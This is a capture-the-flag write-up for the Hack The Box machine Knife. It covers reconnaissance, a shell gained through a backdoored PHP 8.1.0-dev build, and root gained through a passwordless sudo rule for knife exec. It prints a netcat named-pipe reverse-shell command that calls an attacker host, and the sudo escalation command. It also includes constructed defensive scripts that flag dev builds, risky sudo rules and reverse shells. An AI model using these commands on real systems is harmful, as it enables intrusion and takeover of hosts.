Disclaimer
The host penetrated in this article was legally authorized. The tools and methods used here are for learning and exchange only; please do not use the tools or the penetration approach described in this article for any illegal purpose. I accept no responsibility for any consequences arising from that, nor for any misuse or damage caused.
Service detection
```
┌──(root㉿kali)-[~/htb/Knife]
└─# nmap -sV -Pn 10.10.10.242
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-27 23:34 EST
Nmap scan report for 10.10.10.242
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.42 seconds
```
Directory brute-forcing
```
┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.242

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.242/_21-11-27_23-34-49.txt

Error Log: /root/dirsearch/logs/errors-21-11-27_23-34-49.log

Target: http://10.10.10.242/

[23:34:50] Starting:
[23:36:09] 200 -    6KB - /index.php
[23:36:09] 200 -    6KB - /index.php/login/
```
It seems there are no particularly useful pages or directories.
Source code review
Nothing useful stood out.
Software version enumeration
Port 80 hosts a showcase site for something called EMA. A quick search shows EMA is Emergent Medical Associates, an emergency medical service. No obvious CMS was identified.
No useful vulnerabilities found for this Apache version.
No useful vulnerabilities found for this SSH version.
Initial shell
Check the site information:
```
┌──(root㉿kali)-[~/htb/Knife]
└─# whatweb -a 3 http://10.10.10.242/
http://10.10.10.242/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]
```
The site runs PHP/8.1.0-dev. A Google search shows that this development build contains a backdoor, so we use the corresponding exploit script to get an initial shell.
Download the exploit code locally and launch the attack:
```
┌──(root㉿kali)-[~/htb/Knife]
└─# python3 499933.py
Enter the full host url:
http://10.10.10.242
Interactive shell is opened on http://10.10.10.242
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)
$ whoami
james
```
We have an initial shell.
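From the defender's side, the whole foothold above rests on one fact that whatweb read straight from the response headers: the server advertises an unreleased PHP development build. The following is an added example, not code from the original write-up, that applies the same check to captured HTTP responses and grades what it finds. The sample responses, the `release.example` host and the finding labels are constructed for this example; the only real identifiers are the headers observed on this box.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: two raw HTTP response heads as a scanner such as whatweb
# would receive them. The first mirrors the headers observed on this box; the
# second is a release build and must not be flagged.
SAMPLE_RESPONSES = {
    "http://10.10.10.242/": (
        "HTTP/1.1 200 OK\r\n"
        "Server: Apache/2.4.41 (Ubuntu)\r\n"
        "X-Powered-By: PHP/8.1.0-dev\r\n"
        "Content-Type: text/html; charset=UTF-8\r\n"
        "\r\n"
        "<!DOCTYPE html>..."
    ),
    "http://release.example/": (
        "HTTP/1.1 200 OK\r\n"
        "Server: nginx\r\n"
        "X-Powered-By: PHP/8.0.12\r\n"
        "\r\n"
    ),
}

# Matches the banner PHP emits when expose_php is on, e.g. "PHP/8.1.0-dev".
PHP_BANNER_RE = re.compile(r"^PHP/(\d+\.\d+\.\d+)(-dev)?$", re.IGNORECASE)

def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP response head into a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def assess_php_banner(headers: Dict[str, str]) -> Tuple[str, str]:
    """Return (version string, finding) for the X-Powered-By header."""
    m = PHP_BANNER_RE.match(headers.get("x-powered-by", ""))
    if not m:
        return ("", "no-php-banner")
    version, dev = m.group(1), m.group(2) or ""
    if dev and version == "8.1.0":
        # the backdoored development build this write-up exploits
        return (version + dev, "backdoored-dev-build")
    if dev:
        # any other -dev build is unreleased code that should not face the internet
        return (version + dev, "unreleased-dev-build")
    # a release version is still information leakage (set expose_php = Off)
    return (version, "version-disclosed")

def scan(responses: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Assess every captured response and return (url, version, finding) rows."""
    return [(url, *assess_php_banner(parse_headers(raw))) for url, raw in responses.items()]

if __name__ == "__main__":
    for url, version, finding in scan(SAMPLE_RESPONSES):
        print(f"{url:26} {version or '-':12} {finding}")
```

Running it over the constructed sample flags the Knife headers as a backdoored dev build and the second host only as a version disclosure. The fix for the disclosure itself is `expose_php = Off` in php.ini; the fix for the finding that matters is never deploying a `-dev` build.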
Get user.txt
```
$ find / -name user.txt
/home/james/user.txt
```
Privilege escalation
Check sudo privileges
```
$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
```
knife can be run as root without a password.
We use the command below to escalate to root
```
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
```
It returns:
```
$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
No input file specified.
```
Testing shows that the exploit does not give a full shell; many commands do not execute correctly.
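The sudo rule above is the real privilege-escalation bug on this box: `knife exec` evaluates Ruby supplied by the caller, so a passwordless root grant for it is a root grant, full stop. As an added example (not code from the original write-up), the script below parses the rule section of `sudo -l` output and rates each entry, so an auditor can find this class of grant across a fleet before someone else does. The `CODE_EXEC_BINARIES` set, the risk labels and the extra `systemctl` line in the sample are constructed for this example; only the knife entry comes from the box.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: the `sudo -l` output captured on this box, plus one
# password-protected, non-shell entry for contrast.
SUDO_L_OUTPUT = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl restart apache2
"""

# Binaries whose normal feature set includes evaluating user-supplied code
# (knife exec runs Ruby), so a root grant is equivalent to root. Only knife is
# listed here, from this box; a defender extends the set from their own inventory.
CODE_EXEC_BINARIES = {"/usr/bin/knife"}

# One rule line, e.g. "(root) NOPASSWD: /usr/bin/knife"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str
    risk: str   # critical / high / medium / low

def rate(runas: str, nopasswd: bool, command: str) -> str:
    """Rate a rule: root + code-executing binary is the worst case."""
    binary = command.split()[0]
    as_root = runas.split(":")[0].strip() in ("root", "ALL")
    if as_root and binary in CODE_EXEC_BINARIES:
        return "critical" if nopasswd else "high"
    if nopasswd:
        return "medium"
    return "low"

def parse_sudo_l(text: str) -> List[SudoRule]:
    """Parse the rule section of `sudo -l` output into rated SudoRule entries."""
    rules: List[SudoRule] = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        nopasswd = "NOPASSWD" in tags
        rules.append(SudoRule(m.group("runas"), nopasswd, m.group("cmd"),
                              rate(m.group("runas"), nopasswd, m.group("cmd"))))
    return rules

def critical_commands(text: str) -> List[str]:
    """Commands that hand out root without a password to a code-executing binary."""
    return [r.command for r in parse_sudo_l(text) if r.risk == "critical"]

if __name__ == "__main__":
    for r in parse_sudo_l(SUDO_L_OUTPUT):
        print(f"{r.risk:8} ({r.runas}) {'NOPASSWD ' if r.nopasswd else ''}{r.command}")
```

On the sample the knife rule rates critical and the systemctl rule low. Note that removing `NOPASSWD` only downgrades the knife rule to high: because `knife exec` runs arbitrary code, the rule is unsafe at any password setting and the grant itself has to go (edit with `visudo`).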
Looking at the current user's home directory, we find SSH login credentials
```
$ ls -alh /home/james/.ssh
total 16K
drwx------ 2 james james 4.0K May 18  2021 .
drwxr-xr-x 5 james james 4.0K May 18  2021 ..
-rw------- 1 james james 3.4K May  7  2021 id_rsa
-rw-r--r-- 1 james james  741 May  7  2021 id_rsa.pub
```
We added the public key to id_rsa.pub on the target, downloaded the private key locally and logged in with ssh -i, but it still asked for a password. Checking the SSH configuration /etc/ssh/sshd_config showed that private-key login is not enabled.
Looks like another dead end..
So we enumerated reverse-shell payloads one by one to get a full shell back to Kali, and found that the payload below works
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4242 >/tmp/f
```
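The named-pipe payload above, and the pty upgrade that follows it, are among the most recognisable command lines an endpoint sensor will ever record, and the process tree makes it worse for the attacker: the shell is a child of the web server. As an added example (not code from the original write-up), the detector below runs three rules over constructed process-creation events in the shape an EDR or auditd execve feed would produce. The event records, the `WEB_SERVER_PARENTS` and `SHELLS` sets and the rule names are all constructed for this example.

```python
import os
import re
from typing import Dict, List

# Constructed sample in the shape of a process-creation feed (EDR / auditd
# execve): who ran what, under which parent. Events 1-4 reproduce the chain
# the payload above creates on the target; events 5-6 are ordinary activity.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 1201, "user": "james", "parent": "/usr/sbin/apache2",
     "cmdline": "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4242 >/tmp/f"},
    {"pid": 1202, "user": "james", "parent": "/bin/sh", "cmdline": "mkfifo /tmp/f"},
    {"pid": 1204, "user": "james", "parent": "/bin/sh", "cmdline": "nc 10.10.14.5 4242"},
    {"pid": 1210, "user": "james", "parent": "/bin/sh",
     "cmdline": "python3 -c __import__('pty').spawn('/bin/bash')"},
    {"pid": 1300, "user": "www-data", "parent": "/usr/sbin/apache2", "cmdline": "php-cgi"},
    {"pid": 1301, "user": "root", "parent": "/usr/sbin/cron", "cmdline": "mkfifo /run/backup.pipe"},
]

# The named-pipe reverse shell: a fifo, an interactive shell and a netcat
# connection to host:port, all in one command line.
FIFO_SHELL_RE = re.compile(
    r"mkfifo\s+\S+.*\bsh\s+-i\b.*\b(?:nc|ncat|netcat)\s+\S+\s+\d{1,5}\b")
# Interactive-tty upgrade typed into a dumb shell (python pty.spawn).
PTY_UPGRADE_RE = re.compile(r"\bpty\b.{0,40}spawn\(")
# Assumed parent images for "a web server forked this"; adjust per distro.
WEB_SERVER_PARENTS = {"/usr/sbin/apache2", "/usr/sbin/nginx", "/usr/sbin/php-fpm8.1"}
SHELLS = {"sh", "bash", "dash", "zsh"}

def classify(event: Dict) -> List[str]:
    """Return the names of every rule the event matches (empty = benign)."""
    hits: List[str] = []
    cmd = event["cmdline"]
    tokens = cmd.split()
    first = os.path.basename(tokens[0]) if tokens else ""
    if FIFO_SHELL_RE.search(cmd):
        hits.append("fifo-reverse-shell")
    # A web server forking a shell is the generic signal behind any webshell
    # or backdoor, whatever payload it carries; it does not depend on the
    # attacker's exact command line.
    if event["parent"] in WEB_SERVER_PARENTS and first in SHELLS:
        hits.append("web-server-spawned-shell")
    if PTY_UPGRADE_RE.search(cmd):
        hits.append("pty-upgrade")
    return hits

def detect(events: List[Dict]) -> Dict[int, List[str]]:
    """Map pid -> matched rules for every event that triggers at least one rule."""
    alerts: Dict[int, List[str]] = {}
    for event in events:
        hits = classify(event)
        if hits:
            alerts[event["pid"]] = hits
    return alerts

if __name__ == "__main__":
    for pid, hits in detect(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(hits)}")
```

The lone `mkfifo` from cron is deliberately not flagged: named pipes are legitimate, and it is the combination with an interactive shell and an outbound connection, or the web-server parent, that carries the signal. Of the three rules, the parent-process one is the most durable, since it fires on the PHP backdoor stage as well, before any escalation happens.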
Get root.txt
```
┌──(root㉿kali)-[~/htb/Knife]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.242] 38954
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "__import__('pty').spawn('/bin/bash')"
james@knife:/$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
{逗你玩儿~}
```